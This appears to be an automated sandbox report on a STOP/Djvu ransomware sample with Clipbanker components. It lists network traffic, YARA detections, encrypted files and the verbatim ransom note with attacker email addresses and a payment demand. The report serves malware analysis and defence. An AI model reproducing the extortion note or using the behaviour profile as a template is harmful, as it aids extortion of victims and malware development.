Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.59.200.146:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49755 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

1_2_004822E0

Drops certificate files (DER)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0864PsawqSitkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\ONBQCLYSPU.png	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File deleted: C:\Users\user\Desktop\ONBQCLYSPU.png	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\DTBZGIOOSO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File deleted: C:\Users\user\Desktop\DTBZGIOOSO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File moved: C:\Users\user\Desktop\NHPKIZUUSG\VLZDGUKUTZ.mp3	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;h	Jump to dropped file
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99367895039	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99551629943	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99602097722	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99204680961	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99715221672	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99672213188	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma entropy: 7.99054781149	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm entropy: 7.99001752427	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99832563624	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99840398262	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99799287351	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133584016293449682.txt entropy: 7.99828105605	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945531046117.txt entropy: 7.99834776522	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99852848763	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99854330269	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99848897147	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99837321246	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99882269353	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99875628839	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99744672873	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99715807332	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.9942428555	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99852513009	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99527072813	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99784991362	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct150C.tmp.bgzq (copy) entropy: 7.99745307849	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.bgzq (copy) entropy: 7.99740082019	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.bgzq (copy) entropy: 7.99720583359	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct443C.tmp.bgzq (copy) entropy: 7.99707334731	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.bgzq (copy) entropy: 7.99746613624	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.bgzq (copy) entropy: 7.99752768618	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.bgzq (copy) entropy: 7.9971905801	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.bgzq (copy) entropy: 7.99758480291	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.bgzq (copy) entropy: 7.99771158675	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctF411.tmp.bgzq (copy) entropy: 7.99713246377	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgzq (copy) entropy: 7.99204680961	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgzq (copy) entropy: 7.99715221672	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgzq (copy) entropy: 7.99672213188	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.bgzq (copy) entropy: 7.99054781149	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm entropy: 7.99428559508	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
